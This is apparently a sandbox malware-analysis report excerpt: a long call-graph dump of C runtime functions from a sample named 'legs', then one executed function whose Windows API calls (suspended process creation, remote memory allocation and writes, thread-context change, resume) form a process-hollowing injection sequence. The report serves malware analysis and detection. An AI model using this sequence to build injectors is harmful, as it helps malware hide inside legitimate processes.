474899 14432->14434 14433->14435 14436 46e531 __strnicoll 15 API calls 14434->14436 14435->14404 14435->14405 14437 4748a0 14436->14437 14438 4748b9 14437->14438 14439 4748a8 14437->14439 14441 46e641 std::_Locinfo::_Locinfo_dtor WideCharToMultiByte 14438->14441 14440 46e4f7 ___free_lconv_mon 14 API calls 14439->14440 14442 4748ad FreeEnvironmentStringsW 14440->14442 14443 4748c9 14441->14443 14442->14435 14444 4748d0 14443->14444 14445 4748d8 14443->14445 14446 46e4f7 ___free_lconv_mon 14 API calls 14444->14446 14447 46e4f7 ___free_lconv_mon 14 API calls 14445->14447 14448 4748d6 FreeEnvironmentStringsW 14446->14448 14447->14448 14448->14435 14451 46b2af 14450->14451 14452 46f807 _unexpected 14 API calls 14451->14452 14453 46b2d6 14452->14453 14454 46b2de 14453->14454 14455 46b2e8 14453->14455 14456 46e4f7 ___free_lconv_mon 14 API calls 14454->14456 14458 46b345 14455->14458 14460 46f807 _unexpected 14 API calls 14455->14460 14461 46b354 14455->14461 14463 46e16c ___std_exception_copy 29 API calls 14455->14463 14466 46b36f 14455->14466 14468 46e4f7 ___free_lconv_mon 14 API calls 14455->14468 14457 46b1df 14456->14457 14457->14410 14459 46e4f7 ___free_lconv_mon 14 API calls 14458->14459 14459->14457 14460->14455 14663 46b23f 14461->14663 14463->14455 14465 46e4f7 ___free_lconv_mon 14 API calls 14467 46b361 14465->14467 14469 46b485 __Getctype 11 API calls 14466->14469 14470 46e4f7 ___free_lconv_mon 14 API calls 14467->14470 14468->14455 14471 46b37b 14469->14471 14470->14457 14473 46e84f 14472->14473 14474 46e849 14472->14474 14475 46f1da _unexpected 6 API calls 14473->14475 14494 46e855 14473->14494 14476 46f19b _unexpected 6 API calls 14474->14476 14477 46e869 14475->14477 14476->14473 14478 46f807 _unexpected 14 API calls 14477->14478 14477->14494 14480 46e879 14478->14480 14479 46b9c2 CallUnexpected 39 API calls 14481 46e8d3 14479->14481 14482 46e896 14480->14482 14483 46e881 14480->14483 14485 46f1da _unexpected 6 API calls 14482->14485 14484 46f1da _unexpected 6 API calls 14483->14484 14487 46e88d 14484->14487 14486 46e8a2 14485->14486 14488 46e8a6 14486->14488 14489 46e8b5 14486->14489 14492 46e4f7 ___free_lconv_mon 14 API calls 14487->14492 14490 46f1da _unexpected 6 API calls 14488->14490 14491 46ea94 _unexpected 14 API calls 14489->14491 14490->14487 14493 46e8c0 14491->14493 14492->14494 14495 46e4f7 ___free_lconv_mon 14 API calls 14493->14495 14494->14479 14496 46e85a 14494->14496 14495->14496 14497 47040d 14496->14497 14498 470437 14497->14498 14519 470299 14498->14519 14501 470450 14501->14425 14502 46e531 __strnicoll 15 API calls 14503 470461 14502->14503 14504 470477 14503->14504 14505 470469 14503->14505 14526 470094 14504->14526 14506 46e4f7 ___free_lconv_mon 14 API calls 14505->14506 14506->14501 14509 4704af 14510 46ad6d __dosmaperr 14 API calls 14509->14510 14512 4704b4 14510->14512 14511 4704f6 14514 47053f 14511->14514 14537 4707c8 14511->14537 14515 46e4f7 ___free_lconv_mon 14 API calls 14512->14515 14513 4704ca 14513->14511 14516 46e4f7 ___free_lconv_mon 14 API calls 14513->14516 14518 46e4f7 ___free_lconv_mon 14 API calls 14514->14518 14515->14501 14516->14511 14518->14501 14545 467e1a 14519->14545 14522 4702cc 14524 4702e3 14522->14524 14525 4702d1 GetACP 14522->14525 14523 4702ba GetOEMCP 14523->14524 14524->14501 14524->14502 14525->14524 14527 470299 41 API calls 14526->14527 14528 4700b4 14527->14528 14529 47010c __fread_nolock 14528->14529 14531 4700f1 IsValidCodePage 14528->14531 14536 4701b9 14528->14536 14560 470623 14529->14560 14530 4629c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 14532 470297 14530->14532 14533 470103 14531->14533 14531->14536 14532->14509 14532->14513 14533->14529 14534 47012c GetCPInfo 14533->14534 14534->14529 14534->14536 14536->14530 14538 4707d4 ___scrt_is_nonwritable_in_current_image 14537->14538 14637 46b750 EnterCriticalSection 14538->14637 14540 4707de 14638 470562 14540->14638 14546 467e31 14545->14546 14547 467e38 14545->14547 14546->14522 14546->14523 14547->14546 14548 46e783 _unexpected 39 API calls 14547->14548 14549 467e59 14548->14549 14550 46ed66 __Getctype 39 API calls 14549->14550 14551 467e6f 14550->14551 14553 46ed93 14551->14553 14554 46edbb 14553->14554 14555 46eda6 14553->14555 14554->14546 14555->14554 14557 470039 14555->14557 14558 46e783 _unexpected 39 API calls 14557->14558 14559 47003e 14558->14559 14559->14554 14561 47064b GetCPInfo 14560->14561 14562 470714 14560->14562 14561->14562 14563 470663 14561->14563 14565 4629c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 14562->14565 14571 46faf3 14563->14571 14567 4707c6 14565->14567 14567->14536 14570 46fbf4 43 API calls 14570->14562 14572 467e1a __strnicoll 39 API calls 14571->14572 14573 46fb13 14572->14573 14591 46e57f 14573->14591 14575 46fbcf 14577 4629c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 14575->14577 14576 46fbc7 14594 4654a7 14576->14594 14580 46fbf2 14577->14580 14578 46fb40 14578->14575 14578->14576 14579 46e531 __strnicoll 15 API calls 14578->14579 14582 46fb65 __fread_nolock __alloca_probe_16 14578->14582 14579->14582 14586 46fbf4 14580->14586 14582->14576 14583 46e57f __strnicoll MultiByteToWideChar 14582->14583 14584 46fbae 14583->14584 14584->14576 14585 46fbb5 GetStringTypeW 14584->14585 14585->14576 14587 467e1a __strnicoll 39 API calls 14586->14587 14588 46fc07 14587->14588 14600 46fc3d 14588->14600 14598 46e5a9 14591->14598 14595 4654c2 14594->14595 14596 4654b1 14594->14596 14595->14575 14596->14595 14597 46c522 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 14 API calls 14596->14597 14597->14595 14599 46e59b MultiByteToWideChar 14598->14599 14599->14578 14601 46fc58 __strnicoll 14600->14601 14602 46e57f __strnicoll MultiByteToWideChar 14601->14602 14606 46fc9c 14602->14606 14603 46fe17 14604 4629c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 14603->14604 14605 46fc28 14604->14605 14605->14570 14606->14603 14607 46e531 __strnicoll 15 API calls 14606->14607 14609 46fcc2 __alloca_probe_16 14606->14609 14620 46fd6a 14606->14620 14607->14609 14608 4654a7 __freea 14 API calls 14608->14603 14610 46e57f __strnicoll MultiByteToWideChar 14609->14610 14609->14620 14611 46fd0b 14610->14611 14611->14620 14628 46f31a 14611->14628 14614 46fd41 14619 46f31a std::_Locinfo::_Locinfo_dtor 6 API calls 14614->14619 14614->14620 14615 46fd79 14616 46fe02 14615->14616 14617 46e531 __strnicoll 15 API calls 14615->14617 14621 46fd8b __alloca_probe_16 14615->14621 14618 4654a7 __freea 14 API calls 14616->14618 14617->14621 14618->14620 14619->14620 14620->14608 14621->14616 14622 46f31a std::_Locinfo::_Locinfo_dtor 6 API calls 14621->14622 14623 46fdce 14622->14623 14623->14616 14634 46e641 14623->14634 14625 46fde8 14625->14616 14626 46fdf1 14625->14626 14627 4654a7 __freea 14 API calls 14626->14627 14627->14620 14629 46f689 std::_Lockit::_Lockit 5 API calls 14628->14629 14630 46f325 14629->14630 14631 46f3b6 __strnicoll 5 API calls 14630->14631 14633 46f32b 14630->14633 14632 46f36b LCMapStringW 14631->14632 14632->14633 14633->14614 14633->14615 14633->14620 14636 46e654 std::_Locinfo::_Locinfo_dtor 14634->14636 14635 46e692 WideCharToMultiByte 14635->14625 14636->14635 14637->14540 14648 46c20e 14638->14648 14640 470584 14641 46c20e __fread_nolock 29 API calls 14640->14641 14642 4705a3 14641->14642 14643 4705ca 14642->14643 14644 46e4f7 ___free_lconv_mon 14 API calls 14642->14644 14645 470809 14643->14645 14644->14643 14662 46b767 LeaveCriticalSection 14645->14662 14647 4707f7 14647->14514 14649 46c21f 14648->14649 14658 46c21b _Yarn 14648->14658 14650 46c226 14649->14650 14653 46c239 __fread_nolock 14649->14653 14651 46ad6d __dosmaperr 14 API calls 14650->14651 14652 46c22b 14651->14652 14654 46b458 __strnicoll 29 API calls 14652->14654 14655 46c267 14653->14655 14656 46c270 14653->14656 14653->14658 14654->14658 14657 46ad6d __dosmaperr 14 API calls 14655->14657 14656->14658 14660 46ad6d __dosmaperr 14 API calls 14656->14660 14659 46c26c 14657->14659 14658->14640 14661 46b458 __strnicoll 29 API calls 14659->14661 14660->14659 14661->14658 14662->14647 14664 46b24c 14663->14664 14665 46b269 14663->14665 14666 46b263 14664->14666 14667 46e4f7 ___free_lconv_mon 14 API calls 14664->14667 14665->14465 14668 46e4f7 ___free_lconv_mon 14 API calls 14666->14668 14667->14664 14668->14665 14670 474931 14669->14670 14671 474942 14670->14671 14673 474955 ___from_strstr_to_strchr 14670->14673 14672 46ad6d __dosmaperr 14 API calls 14671->14672 14681 474947 14672->14681 14674 474b6c 14673->14674 14676 474975 14673->14676 14675 46ad6d __dosmaperr 14 API calls 14674->14675 14677 474b71 14675->14677 14732 474b91 14676->14732 14679 46e4f7 ___free_lconv_mon 14 API calls 14677->14679 14679->14681 14681->14415 14682 4749b9 14718 4749a5 14682->14718 14736 474bab 14682->14736 14683 4749bb 14687 46f807 _unexpected 14 API calls 14683->14687 14683->14718 14685 474997 14690 4749b4 14685->14690 14691 4749a0 14685->14691 14689 4749c9 14687->14689 14688 46e4f7 ___free_lconv_mon 14 API calls 14688->14681 14693 46e4f7 ___free_lconv_mon 14 API calls 14689->14693 14695 474b91 39 API calls 14690->14695 14694 46ad6d __dosmaperr 14 API calls 14691->14694 14692 474a2e 14696 46e4f7 ___free_lconv_mon 14 API calls 14692->14696 14697 4749d4 14693->14697 14694->14718 14695->14682 14702 474a36 14696->14702 14697->14682 14700 46f807 _unexpected 14 API calls 14697->14700 14697->14718 14698 474a79 14699 473f46 std::ios_base::_Init 32 API calls 14698->14699 14698->14718 14701 474aa7 14699->14701 14703 4749f0 14700->14703 14705 46e4f7 ___free_lconv_mon 14 API calls 14701->14705 14709 474a63 14702->14709 14740 473f46 14702->14740 14707 46e4f7 ___free_lconv_mon 14 API calls 14703->14707 14704 474b61 14708 46e4f7 ___free_lconv_mon 14 API calls 14704->14708 14705->14709 14707->14682 14708->14681 14709->14704 14712 46f807 _unexpected 14 API calls 14709->14712 14709->14718 14710 474a5a 14711 46e4f7 ___free_lconv_mon 14 API calls 14710->14711 14711->14709 14713 474af2 14712->14713 14714 474b02 14713->14714 14715 474afa 14713->14715 14717 46e16c ___std_exception_copy 29 API calls 14714->14717 14716 46e4f7 ___free_lconv_mon 14 API calls 14715->14716 14716->14718 14719 474b0e 14717->14719 14718->14688 14720 474b86 14719->14720 14721 474b15 14719->14721 14722 46b485 __Getctype 11 API calls 14720->14722 14749 479a5c 14721->14749 14725 474b90 14722->14725 14726 474b3c 14728 46ad6d __dosmaperr 14 API calls 14726->14728 14727 474b5b 14729 46e4f7 ___free_lconv_mon 14 API calls 14727->14729 14730 474b41 14728->14730 14729->14704 14731 46e4f7 ___free_lconv_mon 14 API calls 14730->14731 14731->14718 14733 474b9e 14732->14733 14734 474980 14732->14734 14764 474c00 14733->14764 14734->14682 14734->14683 14734->14685 14738 474bc1 14736->14738 14739 474a1e 14736->14739 14738->14739 14779 47996b 14738->14779 14739->14692 14739->14698 14741 473f53 14740->14741 14742 473f6e 14740->14742 14741->14742 14743 473f5f 14741->14743 14744 473f7d 14742->14744 14879 479604 14742->14879 14745 46ad6d __dosmaperr 14 API calls 14743->14745 14886 47757c 14744->14886 14748 473f64 __fread_nolock 14745->14748 14748->14710 14898 46f7c8 14749->14898 14754 479acf 14756 46e4f7 ___free_lconv_mon 14 API calls 14754->14756 14757 479adb 14754->14757 14755 46f7c8 39 API calls 14759 479aac 14755->14759 14756->14757 14758 474b36 14757->14758 14761 46e4f7 ___free_lconv_mon 14 API calls 14757->14761 14758->14726 14758->14727 14760 467f14 17 API calls 14759->14760 14762 479ab9 14760->14762 14761->14758 14762->14754 14763 479ac3 SetEnvironmentVariableW 14762->14763 14763->14754 14765 474c13 14764->14765 14772 474c0e 14764->14772 14766 46f807 _unexpected 14 API calls 14765->14766 14777 474c30 14766->14777 14767 474c9e 14769 46b9c2 CallUnexpected 39 API calls 14767->14769 14768 474c8d 14770 46e4f7 ___free_lconv_mon 14 API calls 14768->14770 14771 474ca3 14769->14771 14770->14772 14773 46b485 __Getctype 11 API calls 14771->14773 14772->14734 14774 474caf 14773->14774 14775 46f807 _unexpected 14 API calls 14775->14777 14776 46e4f7 ___free_lconv_mon 14 API calls 14776->14777 14777->14767 14777->14768 14777->14771 14777->14775 14777->14776 14778 46e16c ___std_exception_copy 29 API calls 14777->14778 14778->14777 14780 47997f 14779->14780 14781 479979 14779->14781 14797 479994 14780->14797 14784 47a0b3 14781->14784 14785 47a0fb 14781->14785 14787 47a0b9 14784->14787 14788 47a0d6 14784->14788 14817 47a111 14785->14817 14790 46ad6d __dosmaperr 14 API calls 14787->14790 14792 46ad6d __dosmaperr 14 API calls 14788->14792 14796 47a0f4 14788->14796 14789 47a0c9 14789->14738 14791 47a0be 14790->14791 14793 46b458 __strnicoll 29 API calls 14791->14793 14794 47a0e5 14792->14794 14793->14789 14795 46b458 __strnicoll 29 API calls 14794->14795 14795->14789 14796->14738 14798 467e1a __strnicoll 39 API calls 14797->14798 14799 4799aa 14798->14799 14800 4799c6 14799->14800 14801 4799dd 14799->14801 14811 47998f 14799->14811 14802 46ad6d __dosmaperr 14 API calls 14800->14802 14804 4799e6 14801->14804 14805 4799f8 14801->14805 14803 4799cb 14802->14803 14806 46b458 __strnicoll 29 API calls 14803->14806 14807 46ad6d __dosmaperr 14 API calls 14804->14807 14808 479a05 14805->14808 14809 479a18 14805->14809 14806->14811 14812 4799eb 14807->14812 14813 47a111 __strnicoll 39 API calls 14808->14813 14835 47a1dc 14809->14835 14811->14738 14815 46b458 __strnicoll 29 API calls 14812->14815 14813->14811 14815->14811 14816 46ad6d __dosmaperr 14 API calls 14816->14811 14818 47a121 14817->14818 14819 47a13b 14817->14819 14820 46ad6d __dosmaperr 14 API calls 14818->14820 14821 47a143 14819->14821 14822 47a15a 14819->14822 14825 47a126 14820->14825 14826 46ad6d __dosmaperr 14 API calls 14821->14826 14823 47a166 14822->14823 14824 47a17d 14822->14824 14828 46ad6d __dosmaperr 14 API calls 14823->14828 14832 467e1a __strnicoll 39 API calls 14824->14832 14834 47a131 14824->14834 14829 46b458 __strnicoll 29 API calls 14825->14829 14827 47a148 14826->14827 14830 46b458 __strnicoll 29 API calls 14827->14830 14831 47a16b 14828->14831 14829->14834 14830->14834 14833 46b458 __strnicoll 29 API calls 14831->14833 14832->14834 14833->14834 14834->14789 14836 467e1a __strnicoll 39 API calls 14835->14836 14837 47a1ef 14836->14837 14840 47a222 14837->14840 14844 47a256 __strnicoll 14840->14844 14841 4629c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 14842 479a2e 14841->14842 14842->14811 14842->14816 14843 47a2d6 14846 46e57f __strnicoll MultiByteToWideChar 14843->14846 14852 47a2da 14843->14852 14844->14843 14845 47a4ba 14844->14845 14847 47a2c3 GetCPInfo 14844->14847 14844->14852 14849 47a35c 14846->14849 14847->14843 14847->14852 14848 47a4ae 14850 4654a7 __freea 14 API calls 14848->14850 14849->14848 14851 46e531 __strnicoll 15 API calls 14849->14851 14849->14852 14853 47a383 __alloca_probe_16 14849->14853 14850->14852 14851->14853 14852->14841 14852->14845 14853->14848 14854 46e57f __strnicoll MultiByteToWideChar 14853->14854 14855 47a3cf 14854->14855 14855->14848 14856 46e57f __strnicoll MultiByteToWideChar 14855->14856 14857 47a3eb 14856->14857 14857->14848 14858 47a3f9 14857->14858 14859 47a45c 14858->14859 14860 46e531 __strnicoll 15 API calls 14858->14860 14864 47a412 __alloca_probe_16 14858->14864 14861 4654a7 __freea 14 API calls 14859->14861 14860->14864 14862 47a462 14861->14862 14863 4654a7 __freea 14 API calls 14862->14863 14863->14852 14864->14859 14865 46e57f __strnicoll MultiByteToWideChar 14864->14865 14866 47a455 14865->14866 14866->14859 14867 47a47e 14866->14867 14873 46f06c 14867->14873 14870 4654a7 __freea 14 API calls 14871 47a49e 14870->14871 14872 4654a7 __freea 14 API calls 14871->14872 14872->14852 14874 46f5d3 std::_Lockit::_Lockit 5 API calls 14873->14874 14875 46f077 14874->14875 14876 46f3b6 __strnicoll 5 API calls 14875->14876 14878 46f07d 14875->14878 14877 46f0bd CompareStringW 14876->14877 14877->14878 14878->14870 14880 479624 HeapSize 14879->14880 14881 47960f 14879->14881 14880->14744 14882 46ad6d __dosmaperr 14 API calls 14881->14882 14883 479614 14882->14883 14884 46b458 __strnicoll 29 API calls 14883->14884 14885 47961f 14884->14885 14885->14744 14887 477594 14886->14887 14888 477589 14886->14888 14890 47759c 14887->14890 14896 4775a5 _unexpected 14887->14896 14889 46e531 __strnicoll 15 API calls 14888->14889 14895 477591 14889->14895 14893 46e4f7 ___free_lconv_mon 14 API calls 14890->14893 14891 4775cf HeapReAlloc 14891->14895 14891->14896 14892 4775aa 14894 46ad6d __dosmaperr 14 API calls 14892->14894 14893->14895 14894->14895 14895->14748 14896->14891 14896->14892 14897 468f08 codecvt 2 API calls 14896->14897 14897->14896 14899 467e1a __strnicoll 39 API calls 14898->14899 14900 46f7da 14899->14900 14901 46f7ec 14900->14901 14906 46f04d 14900->14906 14903 467f14 14901->14903 14909 467f6c 14903->14909 14907 46f5b9 std::_Lockit::_Lockit 5 API calls 14906->14907 14908 46f055 14907->14908 14908->14901 14910 467f94 14909->14910 14911 467f7a 14909->14911 14913 467fba 14910->14913 14914 467f9b 14910->14914 14927 467efa 14911->14927 14916 46e57f __strnicoll MultiByteToWideChar 14913->14916 14915 467f2c 14914->14915 14931 467ebb 14914->14931 14915->14754 14915->14755 14919 467fc9 14916->14919 14918 467fd0 GetLastError 14936 46ad93 14918->14936 14919->14918 14920 467ff6 14919->14920 14922 467ebb 15 API calls 14919->14922 14920->14915 14923 46e57f __strnicoll MultiByteToWideChar 14920->14923 14922->14920 14925 46800d 14923->14925 14925->14915 14925->14918 14926 46ad6d __dosmaperr 14 API calls 14926->14915 14928 467f05 14927->14928 14929 467f0d 14927->14929 14930 46e4f7 ___free_lconv_mon 14 API calls 14928->14930 14929->14915 14930->14929 14932 467efa 14 API calls 14931->14932 14933 467ec9 14932->14933 14941 467e9c 14933->14941 14944 46ad80 14936->14944 14938 46ad9e __dosmaperr 14939 46ad6d __dosmaperr 14 API calls 14938->14939 14940 467fdc 14939->14940 14940->14926 14942 46e531 __strnicoll 15 API calls 14941->14942 14943 467ea9 14942->14943 14943->14915 14945 46e8d4 __dosmaperr 14 API calls 14944->14945 14946 46ad85 14945->14946 14946->14938 14948 4629c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 14947->14948 14949 4658ca 14948->14949 14949->14288 14951 468d5f 14950->14951 14952 468d4e 14950->14952 14966 468ebb 14951->14966 14953 464fcd std::locale::_Setgloballocale GetModuleHandleW 14952->14953 14955 468d53 14953->14955 14955->14951 14961 468c55 GetModuleHandleExW 14955->14961 14957 468c0d 14957->14259 14962 468c94 GetProcAddress 14961->14962 14963 468ca8 14961->14963 14962->14963 14964 468cc4 14963->14964 14965 468cbb FreeLibrary 14963->14965 14964->14951 14965->14964 14967 468ec7 ___scrt_is_nonwritable_in_current_image 14966->14967 14981 46b750 EnterCriticalSection 14967->14981 14969 468ed1 14982 468db8 14969->14982 14971 468ede 14986 468efc 14971->14986 14974 468cf0 15011 468cd7 14974->15011 14976 468cfa 14977 468d0e 14976->14977 14978 468cfe GetCurrentProcess TerminateProcess 14976->14978 14979 468c55 std::locale::_Setgloballocale 3 API calls 14977->14979 14978->14977 14980 468d16 ExitProcess 14979->14980 14981->14969 14983 468dc4 ___scrt_is_nonwritable_in_current_image std::locale::_Setgloballocale 14982->14983 14984 468e28 std::locale::_Setgloballocale 14983->14984 14989 46aa87 14983->14989 14984->14971 15010 46b767 LeaveCriticalSection 14986->15010 14988 468d97 14988->14957 14988->14974 14990 46aa93 __EH_prolog3 14989->14990 14993 46ad12 14990->14993 14992 46aaba codecvt 14992->14984 14994 46ad1e ___scrt_is_nonwritable_in_current_image 14993->14994 15001 46b750 EnterCriticalSection 14994->15001 14996 46ad2c 15002 46abdd 14996->15002 15001->14996 15003 46abf4 15002->15003 15004 46abfc 15002->15004 15006 46ad61 15003->15006 15004->15003 15005 46e4f7 ___free_lconv_mon 14 API calls 15004->15005 15005->15003 15009 46b767 LeaveCriticalSection 15006->15009 15008 46ad4a 15008->14992 15009->15008 15010->14988 15014 470f55 15011->15014 15013 468cdc std::locale::_Setgloballocale 15013->14976 15015 470f64 std::locale::_Setgloballocale 15014->15015 15016 470f71 15015->15016 15018 46f3e7 15015->15018 15016->15013 15019 46f534 _unexpected 5 API calls 15018->15019 15020 46f403 15019->15020 15020->15016 15022 468697 15021->15022 15023 4686a9 ___scrt_uninitialize_crt 15021->15023 15024 4686a5 15022->15024 15026 46bbb9 15022->15026 15023->14297 15024->14297 15029 46bce4 15026->15029 15032 46bdbd 15029->15032 15033 46bdc9 ___scrt_is_nonwritable_in_current_image 15032->15033 15040 46b750 EnterCriticalSection 15033->15040 15035 46be3f 15049 46be5d 15035->15049 15037 46bdd3 ___scrt_uninitialize_crt 15037->15035 15041 46bd31 15037->15041 15040->15037 15042 46bd3d ___scrt_is_nonwritable_in_current_image 15041->15042 15052 46875f EnterCriticalSection 15042->15052 15044 46bd47 ___scrt_uninitialize_crt 15048 46bd80 15044->15048 15053 46bbc2 15044->15053 15064 46bdb1 15048->15064 15109 46b767 LeaveCriticalSection 15049->15109 15051 46bbc0 15051->15024 15052->15044 15054 46bbd7 _Fputc 15053->15054 15055 46bbde 15054->15055 15056 46bbe9 15054->15056 15057 46bce4 ___scrt_uninitialize_crt 68 API calls 15055->15057 15058 46bc27 ___scrt_uninitialize_crt 64 API calls 15056->15058 15060 46bbe4 _Fputc 15057->15060 15059 46bbf3 15058->15059 15059->15060 15061 470efc __fread_nolock 29 API calls 15059->15061 15060->15048 15062 46bc0a 15061->15062 15067 475164 15062->15067 15108 468773 LeaveCriticalSection 15064->15108 15066 46bd9f 15066->15037 15068 475175 15067->15068 15069 475182 15067->15069 15070 46ad6d __dosmaperr 14 API calls 15068->15070 15071 4751cb 15069->15071 15073 4751a9 15069->15073 15077 47517a 15070->15077 15072 46ad6d __dosmaperr 14 API calls 15071->15072 15074 4751d0 15072->15074 15078 4751e1 15073->15078 15076 46b458 __strnicoll 29 API calls 15074->15076 15076->15077 15077->15060 15079 4751ed ___scrt_is_nonwritable_in_current_image 15078->15079 15091 474ef9 EnterCriticalSection 15079->15091 15081 4751fc 15082 475241 15081->15082 15092 474cb0 15081->15092 15083 46ad6d __dosmaperr 14 API calls 15082->15083 15085 475248 15083->15085 15105 475277 15085->15105 15086 475228 FlushFileBuffers 15086->15085 15087 475234 GetLastError 15086->15087 15088 46ad80 __dosmaperr 14 API calls 15087->15088 15088->15082 15091->15081 15093 474cbd 15092->15093 15095 474cd2 15092->15095 15094 46ad80 __dosmaperr 14 API calls 15093->15094 15097 474cc2 15094->15097 15096 46ad80 __dosmaperr 14 API calls 15095->15096 15098 474cf7 15095->15098 15099 474d02 15096->15099 15100 46ad6d __dosmaperr 14 API calls 15097->15100 15098->15086 15101 46ad6d __dosmaperr 14 API calls 15099->15101 15102 474cca 15100->15102 15103 474d0a 15101->15103 15102->15086 15104 46b458 __strnicoll 29 API calls 15103->15104 15104->15102 15106 474f1c __fread_nolock LeaveCriticalSection 15105->15106 15107 475260 15106->15107 15107->15077 15108->15066 15109->15051 15110 48519e 15111 4851d4 15110->15111 15111->15111 15112 485321 GetPEB 15111->15112 15113 485333 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 15111->15113 15112->15113 15113->15111 15114 4853da WriteProcessMemory 15113->15114 15115 48541f 15114->15115 15116 485461 WriteProcessMemory Wow64SetThreadContext ResumeThread 15115->15116 15117 485424 WriteProcessMemory 15115->15117 15117->15115 17723 463fa3 17725 463fb9 _Yarn 17723->17725 17724 463fbf 17725->17724 17726 464065 17725->17726 17729 46c32c 17725->17729 17726->17724 17728 46c32c __fread_nolock 45 API calls 17726->17728 17728->17724 17732 46c28f 17729->17732 17733 46c29b ___scrt_is_nonwritable_in_current_image 17732->17733 17734 46c2e5 17733->17734 17737 46c2ae __fread_nolock 17733->17737 17744 46c2d3 17733->17744 17745 46875f EnterCriticalSection 17734->17745 17736 46c2ef 17746 46c349 17736->17746 17738 46ad6d __dosmaperr 14 API calls 17737->17738 17740 46c2c8 17738->17740 17742 46b458 __strnicoll 29 API calls 17740->17742 17742->17744 17744->17725 17745->17736 17748 46c35b __fread_nolock 17746->17748 17753 46c306 17746->17753 17747 46c368 17749 46ad6d __dosmaperr 14 API calls 17747->17749 17748->17747 17748->17753 17756 46c3b9 17748->17756 17750 46c36d 17749->17750 17751 46b458 __strnicoll 29 API calls 17750->17751 17751->17753 17752 475d52 __fread_nolock 43 API calls 17752->17756 17760 46c324 17753->17760 17754 46c4e4 __fread_nolock 17758 46ad6d __dosmaperr 14 API calls 17754->17758 17755 46c20e __fread_nolock 29 API calls 17755->17756 17756->17752 17756->17753 17756->17754 17756->17755 17757 470efc __fread_nolock 29 API calls 17756->17757 17759 47625d __fread_nolock 41 API calls 17756->17759 17757->17756 17758->17750 17759->17756 17763 468773 LeaveCriticalSection 17760->17763 17762 46c32a 17762->17744 17763->17762 16703 4642bc 16704 4642c8 16703->16704 16708 4642ff 16704->16708 16709 46cc2c 16704->16709 16706 4642ec 16707 464362 29 API calls 16706->16707 16706->16708 16707->16708 16710 46cc3f _Fputc 16709->16710 16713 46cc99 16710->16713 16712 46cc54 _Fputc 16712->16706 16714 46ccce 16713->16714 16715 46ccab 16713->16715 16714->16715 16718 46ccf5 16714->16718 16716 46b601 _Fputc 29 API calls 16715->16716 16717 46ccc6 16716->16717 16717->16712 16721 46cdcf 16718->16721 16722 46cddb ___scrt_is_nonwritable_in_current_image 16721->16722 16729 46875f EnterCriticalSection 16722->16729 16724 46cde9 16730 46cd2f 16724->16730 16726 46cdf6 16739 46ce1e 16726->16739 16729->16724 16731 46bc27 ___scrt_uninitialize_crt 64 API calls 16730->16731 16732 46cd4a 16731->16732 16733 470d89 14 API calls 16732->16733 16734 46cd54 16733->16734 16735 46f807 _unexpected 14 API calls 16734->16735 16738 46cd6f 16734->16738 16736 46cd93 16735->16736 16737 46e4f7 ___free_lconv_mon 14 API calls 16736->16737 16737->16738 16738->16726 16742 468773 LeaveCriticalSection 16739->16742 16741 46cd2d 16741->16712 16742->16741

                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                    Function 0048519E Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 295threadinjectionmemoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00485110,00485100), ref: 00485334
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00485347
                                                                                                                                                                                                                                                    • Wow64GetThreadContext.KERNEL32(0000008C,00000000), ref: 00485365
                                                                                                                                                                                                                                                    • ReadProcessMemory.KERNELBASE(00000088,?,00485154,00000004,00000000), ref: 00485389
                                                                                                                                                                                                                                                    • VirtualAllocEx.KERNELBASE(00000088,?,?,00003000,00000040), ref: 004853B4
                                                                                                                                                                                                                                                    • WriteProcessMemory.KERNELBASE(00000088,00000000,?,?,00000000,?), ref: 0048540C
                                                                                                                                                                                                                                                    • WriteProcessMemory.KERNELBASE(00000088,00400000,?,?,00000000,?,00000028), ref: 00485457
                                                                                                                                                                                                                                                    • WriteProcessMemory.KERNELBASE(00000088,?,?,00000004,00000000), ref: 00485495
                                                                                                                                                                                                                                                    • Wow64SetThreadContext.KERNEL32(0000008C,013A0000), ref: 004854D1
                                                                                                                                                                                                                                                    • ResumeThread.KERNELBASE(0000008C), ref: 004854E0
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2395533512.0000000000485000.00000040.00000001.01000000.00000009.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395439698.0000000000460000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395464414.0000000000461000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395506734.000000000047C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395556266.0000000000486000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395578761.0000000000488000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395602614.000000000048A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2395634393.000000000048D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_460000_legs.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
